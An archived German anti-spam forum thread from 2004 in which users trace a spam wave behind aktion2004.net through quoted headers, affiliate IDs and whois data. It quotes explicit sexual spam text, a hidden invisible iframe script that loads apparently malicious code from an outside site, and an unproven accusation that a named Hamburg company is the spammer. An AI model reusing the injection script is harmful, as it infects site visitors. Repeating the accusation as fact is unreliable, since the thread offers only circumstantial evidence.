PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : aktion2004- abmelden möglich?



jojothemojo
28.09.2004, 14:56
Hallo,
seit geraumer Zeit erhalte ich diverse Spam Mails die auf www.aktion2004. adressen verweisen. Manchmal ist in den Mails ein Link zum "abmelden" enthalten :
z.B
Du willst keine weiteren emails erhalten?
http://gmkvx.eebefbk.info/ibont?U7qZW9UONY_NGUokkuco
Es ein php formular:
Enter your email: EINGABEFELD
UNSUSCRIBE Button

Meine Frage:
Hat irgend jemand ausprobiert ob das wirklich hilft oder bekommt man nur noch mehr Spam?Oder Validiert nur seine adresse?
Habe interessehalber eine Mailadresse eingegeben die ich jedezeit löschen kann, aber bisher hat sich nix getan (weder positiv noch negativ)

Eniac
28.09.2004, 15:05
> Hat irgend jemand ausprobiert ob das wirklich hilft oder bekommt man nur noch mehr Spam?Oder Validiert nur seine adresse?
Letzeres. Wenn Deine Adresse in der Spammerdatenbank war, ist sie durch das "austragen" validiert und dürfte noch mehr Spam abbekommen.
Eniac

--
why shold your mobile phone number is ringing no reply, if you have better phone which we can always be geting you kindly give because, we are tired with your mobile phone and your office phone it is only your fax was working why ?

kindly give us life phone not dead one like your mobile which was ringing no reply every time why ? - Charles Soludo (cbn )

DocSnyder
28.09.2004, 15:16
Hat irgend jemand ausprobiert ob das wirklich hilft oder bekommt man nur noch mehr Spam?
Und wie das hilft, mehr Spam zu bekommen. Die Inkubationszeit kann dabei gelegentlich Wochen oder sogar Monate dauern, aber dann kommt auf die eingeworfene Adresse ordentlich Spam.
Deshalb sollte man auf keinen Fall[TM] Adressen anderer Spammer, z. B. der Nigeria-Connection, "austragen".
/.
DocSnyder.
--
Friss, Spammer, friss: http://docsnyder.de/spl/forum/

Eniac
28.09.2004, 15:19
> Deshalb sollte man auf keinen Fall[TM] Adressen anderer Spammer, z. B. der Nigeria-Connection, "austragen".
IHMO bringt das nicht viel, da meistens nur Adressen validiert werden, die bereits in der Spammerdatenbank sind. Andere werden in der Regel verworfen, habe ich schon mal ausprobiert.

Eniac
--
why shold your mobile phone number is ringing no reply, if you have better phone which we can always be geting you kindly give because, we are tired with your mobile phone and your office phone it is only your fax was working why ?

kindly give us life phone not dead one like your mobile which was ringing no reply every time why ? - Charles Soludo (cbn )

DocSnyder
28.09.2004, 16:57
Es kommt darauf an, bei welchem Spammer man "austrägt". Ich werfe ja auch gelegentlich mal eine Spamtrapadresse irgendwo ein, die bisher noch nie bespammt wurde, da sie bis zum Zeitpunkt des Einwurfs bzw. ein paar Minuten davor noch nicht existierte.
Bisher ist auf fast alle derartigen Adressen Spam gekommen, wenn auch ggf. erst nach einem halben Jahr.
/.
DocSnyder.

--
Friss, Spammer, friss: http://docsnyder.de/spl/forum/

newbie0815
28.09.2004, 18:51
du hast echt ein an der Pfanne Docsnyder - "ich werfe da Spamtraps ein die noch nicht existiert haben um mich denn an dem Spam der da ankommt aufgeilen zu können" *lol*
du musst echt zu viel Zeit haben...wirf doch ein so viel du willst.
vielleicht will aktion2004 ja so wirklich mal die antis und eh-nix-kaufenden aus der liste haben.
Aber die Mär vom mails validieren und adressen über remove-boxen sammeln passt ja besser in dein Bild und in das was du Hilfs-Sheriff präsentieren willst.
So - und nun mach nen trace auf meine IP und erzähl es alles. Ich kanns ja gleich so sagen - im augenblick surf ich über freenet - hab ich dir jetzt ein Teil des Spaßes genommen?

Martin S.
28.09.2004, 19:23
Hallo Dennis! Wieder ein neuer Nick? Zu schade dass die vorherigen zwei schon enttarnt sind.
--
Think globally - act locally. Auch bei Gesetzen gegen Spam

DocSnyder
28.09.2004, 19:29
Spamtraps setze ich ein, um meine Blacklists zu füttern, damit weniger Spam an "echte" User kommt. Was bisher sehr gut funktioniert.
/.
DocSnyder.
--
Friss, Spammer, friss: http://docsnyder.de/spl/forum/

newbie0815
29.09.2004, 08:31
@ martin s
wer bidde is Dennis?
ich heisse Stefan und wüsste nicht dass ich jeanders gehiessen hätte
@snyder
ich weiss ja nicht warum du das machst. ob du systemadmin bist oder was auch immer, aber zum kampf gegen spam oder um blacklisten zu nutzen gibts doch die netten RBL`s oder nimmst du die gefälschten Absenderadressen in Blacklisten auf http://img.homepagemodules.de/rolling_eyes.gif

Stalker2002
02.10.2004, 15:35
@snyder
ich weiss ja nicht warum du das machst. ob du systemadmin bist oder was auch immer, aber zum kampf gegen spam oder um blacklisten zu nutzen gibts doch die netten RBL`s oder nimmst du die gefälschten Absenderadressen in Blacklisten auf
Ich bin zwar nicht der Doc, aber ich kann dir sagen, das er die Relays, über die mit gefälschtem Absender auf seine Spamtraps gemüllt wird, in eine Blacklist einkerkert.
MfG
L.
---
"Der Grund war nicht die Ursache, sondern der Auslöser."
Franz "der Kaiser" Beckenbauer

Smoker
05.10.2004, 08:53
Hallo Forum!
Habe dieses Forum durch googeln gefunden und war überrascht das es sowas überhaupt gibt.
Ich bekomme dauernd Sex-Spam und weiß nicht so Recht wie ich das stoppen soll. Zwar landen die Mails oft im Filter von GMX.DE, aber dies nervt trotzdem.
Bei diesem Ralf Streck hatte ich mich auch schon beschwert, diese beteuert jedoch nichts damit zu tun zu haben.
Was ist zu tun?
-=Smoker=-
Hier die Mail:
+++++++++++++++++++++++++++
Return-Path: <ylfhancdaj [at] 444.net>
X-Flags: 0000
Delivered-To: GMX delivery to #
Received: (qmail 23107 invoked by UID: [UID filtered]
Received: from cpe-66-169-53-057.spa.sc.charter.com (HELO 444.net) (66.169.53.57)
by mx0.gmx.net (mx013) with SMTP; 05 Oct 2004 xx:xx:xx +0200
Message-ID: [ID filtered]
Reply-To: "Casino" <ylfhancdaj [at] 444.net>
From: "Casino" <ylfhancdaj [at] 444.net>
To: "User" <#>
Subject: *** GMX Spamverdacht *** Ich habe Deine Mutter gef*ckt
Date: Mon, 04 Oct 2004 xx:xx:xx -0900
MIME-Version: 1.0
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
X-GMX-Antivirus: -1 (not scanned, may not use virus scanner)
X-GMX-Antispam: 3 (Internal IP blacklist C)
Hallo Du!
Ich lege regelmäßig geile Mütter flach. Vielleicht habe ich auch Deine schon gefickt?
Schnell schau rein:
http://www.aktion2004.net/d0/?wmid=78291
Grüße vom
Mutterficker

Smoker
05.10.2004, 11:13
Gehört das auch zu aktion2004.net?
Wieso versenden die jetzt unter einer IP Adresse den Spam?
-=Smoker=-
Received: from [138.89.6.48] (helo=east.verizon.net)
by mx27.web.de with smtp (WEB.DE 4.101 #87)
ID: [ID filtered]
Message-ID: [ID filtered]
Reply-To: <fggt567 [at] east.verizon.net>
From: <fggt567 [at] east.verizon.net>
To: "Dich" <@web.de>
Subject: So klappt es
Date: Tue, 05 Oct 2004 xx:xx:xx -0200
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1123
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1123
Sender: fggt567 [at] east.verizon.net
Hallo,
du willst ein schnelles Treffen ohne Verpflichtungen?
Dann klick auf den unten stehenden Link!
http://211.115.213.172/sus0811/date/
Hier bekommst du alles, wovon du sonst nur träumen kannst.
Also trau dich und es wird unvergessen für dich!

Coke1984
05.10.2004, 11:25
Läuft auch über digitalpayment... und hat nen Javascript trojaner. Dann weiß man ja wo die nächste Welle zu erwarten sein wird.
Edit: Wobei ja theortisch[tm] die möglichkeit besteht, das ein unabhängiger spammer sich da angemeldet hat.
---
life, n: The whim of several billion cells to be with you for a while.

Smoker
05.10.2004, 11:32
wo steht da was mit Digitalpayment? Und was ist das?

Coke1984
05.10.2004, 11:45
Wenn du auf den link "passwort holen" klickst verbindet der dich mit dem digitalpayment.de server, und das ist ein service der zu maxolution gehört (siehe whois abfrage). Der selbe service, den auch aktion2004.net verwendet...
---
life, n: The whim of several billion cells to be with you for a while.

Smoker
05.10.2004, 11:56
Habs gefunden. Danke

Account gesperrt

Sehr geehrter User,
Der Zugang zu diesem Bereich ist aufgrund von Missbrauchs des Accounts gesperrt.
Sollten Sie Fragen hierzu haben wenden Sie sich an den Seitenbetreiber des Angebots oder kontaktieren Sie unseren Support (support [at] customersupport.de) unter Angabe des Angebotes auf dem Sie Mitglied werden wollten! Unser Support-Team steht Ihnen jederzeit gerne bei allen auftretenden Fragen zur verfügung!
Der Betreiber des Paymentsystems distanziert sich ausdrücklich von der Art der Bewerbung die durch den Anbieter der Seite selbst durchgeführt wurde!

das kommt bei aktion2004.net
#####
Bei der IP Seite kommt was mit Benutzername und eMail Adresse

Smoker
05.10.2004, 11:58
beschwere ich mich jetzt also bei: support [at] customersupport.de
oder wo sollte ich meine beschwerde hinsenden?
Bringt es was beim Domaininhaber zu beschweren? Bei aktion2004.net sieht das nicht gerade aus als würden die Daten stimmen.
-=Smoker=-

Smoker
05.10.2004, 12:14
hä? gerade konnte ich noch ein Benutername und eMail Adresse eingeben und jetzt kommt unter der IP Adresse auch ein Hinweis das der Account gesperrt sei.
Kommt das nur bei mir? Vor ein paar Minuten kam da noch was anderes http://img.homepagemodules.de/frage.gif

dk99hi
05.10.2004, 12:18
Cool WM 2255 ist gesperrt und WM2254 ist noch Online.
Aber der Leidensdruck dieser "Dienstleister" muss ja arg groß
sein wenn sich nach Monaten was tut.

Smoker
05.10.2004, 12:21
Wo siehst du die WM Nummern? Bei mir sind überall alles gesperrt was ich bekommen habe. Oder muss ich den Cache leeren?

dk99hi
05.10.2004, 12:27
http://www.aktion2004.net/d2/eingang.html als Beispiel
Aber jetzt (5Min später) ist auch die Nummer 2254 gesperrt.
Die lesen hier anscheinend mithttp://img.homepagemodules.de/grin.gif!

Coke1984
05.10.2004, 12:28
Die lesen hier anscheinend mit!
Nicht ganz neu, diese Erkenntniss http://img.homepagemodules.de/smile2.gif
---
life, n: The whim of several billion cells to be with you for a while.

Smoker
05.10.2004, 12:32
Der Link war zuvor auch schon gesperrt. Wahrscheinlich hattest Du einen Reload machen müssen?
Alles was auf der Domain aktion2004.net liegt war bei mir gestern schon mit "Account gesperrt" versehen. Aber trotzdem werde ich noch angemailt und von dieser IP Adresse Seite auch.

dk99hi
05.10.2004, 18:46
Die Spammer sind ja doch nicht so saublöd wie ich immer dachtehttp://img.homepagemodules.de/frage.gif
Über
http://www.aktion2004.net/d2/eingang.html
ist der Account 2254 gesperrt.
Über
http://digitalpayment.de/paygate/?wm=225...dl=1&dt=1&do=65 (http://digitalpayment.de/paygate/?wm=2254&ag=94&lg=de&py=8&sc=1&dp=1&st=2&dl=1&dt=1&do=65)
ist er nicht gesperrt.
Was stimmt den nu?

dk99hi
05.10.2004, 18:50
Grad ist Werbung für
hXXp://www.aktion2004.net/f0/casino-setup.exe
eingetroffen.
Dieses kostenlose Tool werde ich mir doch gleich runterladen solange es verfügbar ist.

Spacetaxi
05.10.2004, 19:45
kam gerade bei mir rein:
Received: from [200.78.119.148] (helo=prod-infinitum.com.mx)
by mx20.web.de with smtp (WEB.DE 4.101 #87)
ID: [ID filtered]
Message-ID: [ID filtered]
Reply-To: "support" <ggoog [at] prod-infinitum.com.mx>
From: "support" <ggoog [at] prod-infinitum.com.mx>
To: "Persönlich" <XXXX>
Subject: Treffen 20 Uhr
Date: Tue, 05 Oct 2004 xx:xx:xx +0200
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1158
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1158
Sender: ggoog [at] prod-infinitum.com.mx
Hallo,
du möchtest so schnell wie möglich ein heißes Date?
Hier kannst du es sofort klar machen!
h11p://211.115.213.172/sus0811/fundate/
Egal was du brauchst und wie schmutzig deine Phantasie ist,
hier findest du es garantiert!

doc33
05.10.2004, 20:09
Die sperren scheinen inzwischen ausgehebelt worden zu sein, jedenfalls gehen die IDs zumindest beim paymentsystem noch/wieder, seltsam ist auch mal wieder das Maxolution erst zu dieser Art sperren übergegangen ist nachdem hier im Forum mehrfach diese Idee aufkam, kann ein Webhoster nicht selber auf sowas kommen ? Ach nein es handelt sich um Maxolution die offenbar daran mitverdienen, ich ziehe die Frage zurück...

Smoker
05.10.2004, 20:39
Wie ausgeheblt? Also ich bekomme auf allen Seiten "Account gesperrt" http://img.homepagemodules.de/frage.gif

doc33
05.10.2004, 20:47
Klick mal auf die Eingangsseite und dort dann auf Passwort anfordern oder auf Mitglieder Login, die ID: [ID filtered]
Aber bitte nicht zu oft machen, ich glaube nämlich nicht das dem kein Geld mehr dafür gezahlt wird.

Smoker
05.10.2004, 21:35
Das ist ja klar. Denn die Leute die dort ein Abo gekauft haben müssen ja in ihren Account sich einloggen können. Das diese Seiten noch gehen ist deshalb verständlich. Das wichtigste ist doch das keiner mehr dort was kaufen kann. Oder kann man da etwa doch noch was kaufen?

doc33
05.10.2004, 21:45
Meiner Meinung nach kann man da noch was kaufen denn es geht ja nicht nur der Einloggen Link noch sondern auch der sich anzumelden, also Passwort anfordern. Einloggen und Anfordern läuft beides mit ID: [ID filtered]

Smoker
05.10.2004, 21:55
Irgendwie kann ich Dir nicht folgen.
Ich habe nirgends eine Option gefunden wo man sich noch anmelden kann.
Vielleicht kenne ich mich aber auch nur viel zu wenig mit dem ganzen Spam Zeug aus. http://img.homepagemodules.de/frage.gif

doc33
05.10.2004, 23:07
Die Seiten selber kennst du sicher oder? (aktion2004.net z.b.) da steht irgendwo ein Link mit der Bezeichnung Eingang, wenn du da drauf klickst kannst du auf der nächsten Seite dich Einloggen oder dich neu anmelden und das mit angabe der ID.

Smoker
06.10.2004, 07:43
Stimmt, jetzt habe ich es auch gefunden. DANKE
Aber glaubst Du wirklich das ein normaler Kunde einen solchen Umweg geht? Der Klickt auf "Password holen" und sieht das dies gesperrt ist wegen Mißbrauch. Dann schreibt er entweder ne Mail an den Support oder verlässt zu 99,99% die Seite sofort wieder.

alfred
06.10.2004, 09:49
Nanu,
irgendwie geht jetzt überhaupt nix mehr mit aktion2004.net.
Mal sehen wie lange :-)
Alfred

Smoker
06.10.2004, 10:01
http://211.115.213.172/sus0811/fundate/
Hier findet man im Quelltext folgendes:
<script>var out=`<iframe width=2 height=2 style=visibility:hidden src=http://songtexte.netzring.net/load/iframe.php?wmid=10013></iframe>`;
document.write(out);</script>

http://songtexte.netzring.net
Bekommt man da draus wer der Spammer ist?

Coke1984
06.10.2004, 10:08
Also da dieser "netzring.net" sich offenbar noch im Aufbau befindet, der Spammer allerdings schon eine Subdomain hat liegt der Verdacht nahe, dass die in Zusammenhang stehen. Laut whois ist der Verantwortliche die:
Netfun Media Corp.
Netfun Media Corp. Netfun Media Corp. (netfunmedia [at] gmx.net)
+1.2062222038
Fax: none
1461 A First Avenue, 360
New York, 10021
US
Allerdings bezweifel ich das jemand mit GMX-Account in der First Avenue ansäßig ist...
Man könnte ja mal versuchen die Addy zu baiten http://img.homepagemodules.de/grin.gif
---
life, n: The whim of several billion cells to be with you for a while.

Smoker
06.10.2004, 10:12
Ohh, googeln hilft wohl...

<script>var out=`<iframe width=2 height=2 style=visibility:hidden src=http://songtexte.netzring.net/load/iframe.php?wmid=10012></iframe>`;
document.write(out);</script>
Gefunden auf: http://www.edonkex.de/

Siehe dazu auch: http://www.geierforum.de/viewtopic.php?p=71261
interessant ist auch:

Er hats bei Paidpops auch gemacht. Hatte diesbezüglich in den vergangenen Tagen etliche Beschwerden. Habe ihn ebenfalls gesperrt.
Bei mir hat er die Seite Moneyquiz.net beworben. Darin befand sich ein iFrame welches einen Code von songtexte.netzring.net aufrief. Dieser Code verursachte bei den Virenkillern alarm. Mit FindFox hat er am Freitag angefangen. Wie mir scheint benutzt er nur Exchangedienste oder 50/50 Dienste dazu.
Man vergleiche mal die beiden Seiten http://www.MoneyQuiz.net und http://www.Quizion.de.

Smoker
06.10.2004, 10:14
Habe ich jetzt einen Denkfehler, oder steckt hinter der ganzen Spamwelle die Firma Funquadrat GmbH aus Hamburg?

Spacetaxi
06.10.2004, 10:29
Kam heute rein gleich zweimal!
Received: from [200.208.219.146] (helo=lycos.de)
by mx24.web.de with smtp (WEB.DE 4.101 #87)
ID: [ID filtered]
for xxxx; Wed, 06 Oct 2004 xx:xx:xx +0200
Message-ID: [ID filtered]
From: "Sternchen" <ssppy [at] lycos.de>
To: "Inhaber" <xxxxxe>
Subject: Partyzeit
Date: Wed, 06 Oct 2004 xx:xx:xx +0300
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1158
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1158
Sender: ssppy [at] lycos.de
Du darfst auf keiner Party fehlen?
Hier hab ich was für dich!
h11p://www.thebestmail.org/party/
Das sind die verrücktesten Partys die du je erlebt hast!
Also, dabei sein ist alles!

Received: from [168.226.93.252] (helo=speedy.com.ar)
by mx24.web.de with smtp (WEB.DE 4.101 #87)
ID: [ID filtered]
Message-ID: [ID filtered]
From: "Larissa" <vvffr [at] speedy.com.ar>
To: "Inhaber" <xxxxx>
Subject: Ok,morgen 20Uhr
Date: Tue, 05 Oct 2004 xx:xx:xx -0700
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1123
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1123
Sender: vvffr [at] speedy.com.ar
Hallo,
du willst ein schnelles Treffen ohne Verpflichtungen?
Dann klick auf den unten stehenden Link!
Hier bekommst du alles wovon du sonst nur träumen kannst!
Also, trau dich und es wird unvergessen für dich!
h11p://www.thebestmail.org/hobby
beide sind kurz hintereinander eingeschlagen

@smoker
vielleicht kommt ja hier jemand aus Hamburg und besucht mal die Firma Funquadrat

Smoker
06.10.2004, 10:34
Der spammt munter weiter, ist ja krass.
Hat der noch nicht gemerkt das sein Account gesperrt ist?
Parter ID: [ID filtered]
Partner ID: [ID filtered]

doc33
06.10.2004, 18:35
Also laut Maxolution bekommt der ja schon seit Monaten kein Geld mehr ausgezahlt also müßte er das eigentlich längst gemerkt haben...Vorrausgesetzt Maxolution zahlt wirklich nix mehr an den aus (was ich nicht glaube) oder der Spammer ist sogar zu dämlich seinen Kontoauszug zu lesen (würde mich nicht sonderlich wundern).

Eniac
07.10.2004, 10:35
> Maxolution zahlt wirklich nix mehr an den aus (was ich nicht glaube)
Angeblich hat seinerzeit die Berliner Würgeschlange auch immer Partner-IDs ihrer Dialerspammer gesperrt und trotzdem wurde munter weiter gespammt. So viel zur Glaubwürdigkeit solcher Aussagen.

> oder der Spammer ist sogar zu dämlich seinen Kontoauszug zu lesen (würde mich nicht sonderlich wundern).
Unwahrscheinlich. Obwohl diese Pfeifen ansonsten völlig grenzdebil sind; wenn`s um Kohle geht wachen die erstaunlich schnell aus ihrem geistigen Dämmerschlaf auf.

Eniac
--
thanks you very murch.
why you are abusing me saying something about shot pennis why? why have my done wrong to contact you for this transfer ? why cant you call me on your phone do you want to hang me on phone all the time cant you call ? - Charles Soludo (cbn )

Smoker
07.10.2004, 17:44
Ohh, googeln hilft wohl...

In Antwort auf:
--------------------------------------------------------------------------------
<script>var out=`<iframe width=2 height=2 style=visibility:hidden src=http://songtexte.netzring.net/load/iframe.php?wmid=10012></iframe>`;
document.write(out);</script>
--------------------------------------------------------------------------------

Gefunden auf: http://www.edonkex.de/

Siehe dazu auch: http://www.geierforum.de/viewtopic.php?p=71261
interessant ist auch:

In Antwort auf:
--------------------------------------------------------------------------------
Er hats bei Paidpops auch gemacht. Hatte diesbezüglich in den vergangenen Tagen etliche Beschwerden. Habe ihn ebenfalls gesperrt.
Bei mir hat er die Seite Moneyquiz.net beworben. Darin befand sich ein iFrame welches einen Code von songtexte.netzring.net aufrief. Dieser Code verursachte bei den Virenkillern alarm. Mit FindFox hat er am Freitag angefangen. Wie mir scheint benutzt er nur Exchangedienste oder 50/50 Dienste dazu.
Man vergleiche mal die beiden Seiten http://www.MoneyQuiz.net und http://www.Quizion.de.

--------------------------------------------------------------------------------

Oh, jetzt hat die Funquadrat GmbH die zwei Seiten platt gemacht, welche hier gepostet wurden.
Ein Indiz mehr das diese Hamburger Firma der gesuchte Spammer ist und hier mitliest?
Jetzt schnell Beweise vernichten? Oder wie?

Spacetaxi
08.10.2004, 14:01
Der Hamburger kann es einfach nicht lassen!
Maxolution scheint auch den Spammer wieder freigeschalten zu haben!!
Return-path: <roxannenmpicywfddhjmd [at] prod-infinitum.com.mx>
Delivery-date: Fri, 08 Oct 2004 xx:xx:xx +0200
Received: from [194.97.55.190] (helo=mx6.freenet.de)
by mbox77.freenet.de with esmtpa (ID: [ID filtered]
ID: [ID filtered]
for xxx; Fri, 08 Oct 2004 xx:xx:xx +0200
Received: from [201.128.2.142] (helo=prod-infinitum.com.mx)
by mx6.freenet.de with smtp (Exim 4.42 #1)
ID: [ID filtered]
Message-ID: [ID filtered]
From: "Ginette" <roxannenmpicywfddhjmd [at] prod-infinitum.com.mx>
To: "Tassilo" <xxx
Subject: Ohne Hemmungen gefilmt
Date: Thu, 07 Oct 2004 xx:xx:xx -0400
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1123
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1123
X-Warning: prod-infinitum.com.mx is listed at postmaster.rfc-ignorant.org
X-Warning: prod-infinitum.com.mx is listed at abuse.rfc-ignorant.org
Delivered-To: xxx
Envelope-to: xxx
X-Warning: Message contains advertised URL
X-Warning: Message contains Spam signature (149285::041008015908-4EA1-239A1D5E)
Delivered-To: xxx


Stehst Du auf Porn.s und bist Dauergast in der nächsten Videothek? Dann
haben wir hier bestimmt das richtige für Dich!
Geile Luder, enge Löcher und harte Schw.nze sind massenweise in unserem
Memberbereich vertreten und garantieren Dir eine verdammt heiße Zeit.
Unzensiert zeigen wir Dir, wovon Du sonst immer nur geträumt hast!
Gratis Hardcore-Video-Vorschau - einfach mal angucken!!!
h11p://www.klick-jetzt.com/xxl
Ginette
-----------------------

DocSnyder
08.10.2004, 16:06
Die Domain "klick-jetzt.com" wurde über WhoisGuard.com registriert, weshalb als einzige Whois-Anschrift die von WhoisGuard zu finden ist. Auch die neueste MeaVista-Spamdomain wurde über einen Anbieter registriert, der sich offenbar Anonymität auf die Fahnen schreibt.
Ich habe so das Gefühl, man müsste solche Domains massenhaft in whois.rfc-ignorant.org und deren relevante IPs (A, MX, NS) in ipwhois.rfc-ignorant.org eintüten. SpamAssassin bedient sich recht gerne aus diesen Listen und vergibt auch ganz gut Punkte.
/.
DocSnyder.
--
Friss, Spammer, friss: http://docsnyder.de/spl/forum/

Spacetaxi
08.10.2004, 17:45
Ich habe so das Gefühl, man müsste solche Domains massenhaft in whois.rfc-ignorant.org und deren relevante IPs (A, MX, NS) in ipwhois.rfc-ignorant.org eintüten. SpamAssassin bedient sich recht gerne aus diesen Listen und vergibt auch ganz gut Punkte.
@DocSnyder
und auf deutsch??

DocSnyder
08.10.2004, 17:52
Ich versuch`s mal:
Es gibt diverse Domain-Registrare, die sich auf Spammer und zwielichtige Gestalten spezialisiert haben. Findet man nun ein Verfahren, um beworbene Domains auf ihre Registrare zu prüfen, könnte man damit z. B. Spam besser erkennen und filtern.
Ich würde z. B. auf Domains, die über Gandi registriert sind, etwa einen SpamAssassin-Punkt hergeben, d. h. den "Spam-Score" hochsetzen. E-Mails, die solche Domains enthalten, benötigen dann weniger andere Kriterien, um als Spam erkannt zu werden.
/.
DocSnyder.
--
Friss, Spammer, friss: http://docsnyder.de/spl/forum/

Spacetaxi
08.10.2004, 19:14
@ DocSnyder
danke so versteh ichs auch http://img.homepagemodules.de/heart.gif

Smoker
08.10.2004, 19:37
Hallo DocSnyder!
Du scheinst einer der jenigen hier zu sein, welcher Ahnung von der ganzen Geschichte hier hat. Liege ich mit meinem Verdacht richtig das diese Hamburger Firma hinter dem Spam steckt, oder verdächtige ich nun eine falsche Firma? Wie soll man weiter in der Angelegenheit vorgehen, damit meine Mailbox frei von diesem Dreck wird?

DocSnyder
08.10.2004, 23:21
Ehrlich gesagt bin ich mit der WKAN-Geschichte ein bisschen weniger involviert, da ich eher selten WKAN-Spam bekomme und zurzeit zwei andere Vollpatienten in Behandlung° habe (nämlich ReverZ und MeaVista).
Die Partnerprogramm-Masche habe ich auch erst nach einiger Zeit verstanden. Dies funktioniert so, dass irgendjemand ein kostenpflichtiges WWW-Angebot betreibt und über (anonyme) Dritte bewerben lässt. Diese werden dafür am Umsatz beteiligt. Dass Partnerprogramme aufgrund der Anonymität des Werbers zu Spam und Schindluder einladen, liegt auf der Hand, da das Risiko für den Werber hauptsächlich darin besteht, dass er ein Partnerprogramm weniger zu bewerben hat. Ein "anständiger" Webmaster bzw. Bezahldienstleister würde einen solchen Partner nach Kenntnis sofort ausschließen und die Auszahlung verweigern, ggf. eine Vertragsstrafe und/oder Schadensersatz verlangen. Da aber leider die Spammer die meisten Umsätze bringen, werden gerne beide Augen zugedrückt. Dann greift die Mitstörerhaftung, sofern der Webmaster und meist auch der Bezahlsystemanbieter gesicherte Kenntnis über die Spammerei haben (wovon bei einer Mail an abuse@$domain ausgegangen werden kann) und kausal und adäquat am Spam oder an dessen Erfolg mitwirken, indem der Spammer an den generierten Umsätzen beteiligt wird.
Sollte ein Webmaster oder Bezahldienstanbieter aus irgendwelchen Gründen keine Kontrolle über seine Werbepartner haben, ist dies sein Problem und nicht das der Bespammten. Dies musste vor kurzem Dialeranbieter Mainpean in einem Urteil vom OLG Hamburg erfahren.
Wenn man auf irgendwelchen WWW-Sites Partner-IDs findet, die mit denen in Spams oder auf Spam-Sites identisch sind, ist der Fall klar, siehe damals DOEDel und seine Stardialer-IDs. Sind die IDs unterschiedlich, wird es schwierig. Der Nachweis, dass ein Partnerprogramm nur scheinbar betrieben wird, um die Verantwortung auf einen unbekannten Dritten abzuwälzen, ist nur sehr selten möglich. Ein Trick dabei ist, den Site ohne Partnerkennung aufzurufen und zu beobachten, ob irgendwann von selbst eine Partner-ID: [ID filtered]
/.
DocSnyder.
--
Friss, Spammer, friss: http://docsnyder.de/spl/forum/

Spacetaxi
09.10.2004, 07:42
Jetzt schlug erneut eine von klick-jetzt.com ein scheint wohl der nachfolger von aktion2004 zu sein.
Aufjedenfall ist hier das Paymentformular noch aktiv.
Received: from [141.157.27.49] (helo=east.verizon.net)
by mx20.web.de with smtp (WEB.DE 4.101 #87)
ID: [ID filtered]
Message-ID: [ID filtered]
Reply-To: "Fabiano" <salomostnhly [at] nc.rr.com>
From: "Fabiano" <salomostnhly [at] nc.rr.com>
To: "Utto" xxx
Subject: deine neuen Filme
Date: Sat, 09 Oct 2004 xx:xx:xx +1200
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1158
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1158
Sender: salomostnhly [at] nc.rr.com
Stehst Du auf Porn.s und bist Dauergast in der nächsten Videothek? Dann
haben wir hier bestimmt das richtige für Dich!
Geile Luder, enge Löcher und harte Schw.nze sind massenweise in unserem
Memberbereich vertreten und garantieren Dir eine verdammt heiße Zeit.
Unzensiert zeigen wir Dir, wovon Du sonst immer nur geträumt hast!
Gratis Hardcore-Video-Vorschau - einfach mal angucken!!!
h11p://www.klick-jetzt.com/xxl
Fabiano
-----------------------

Smoker
09.10.2004, 09:25
Hallo DocSnyder!
Vielen Dank für Deine ausführlichen Worte.
Meine Beobachten zufolge, deutet bei dem Spammer in diesem Fall sehr viel auf die Firma Funquadrat GmbH aus Hamburg hin. Die Indizien dazu habe ich in diesem Thread bereits gepostet. Reichen diese Indizien bereits aus um gegen diesen Hamburger Spammer vorzugehen?
Wie hoch ist die Wahrscheinlichkeit das die Hamburger Firma hinter dieser Spamwelle steckt?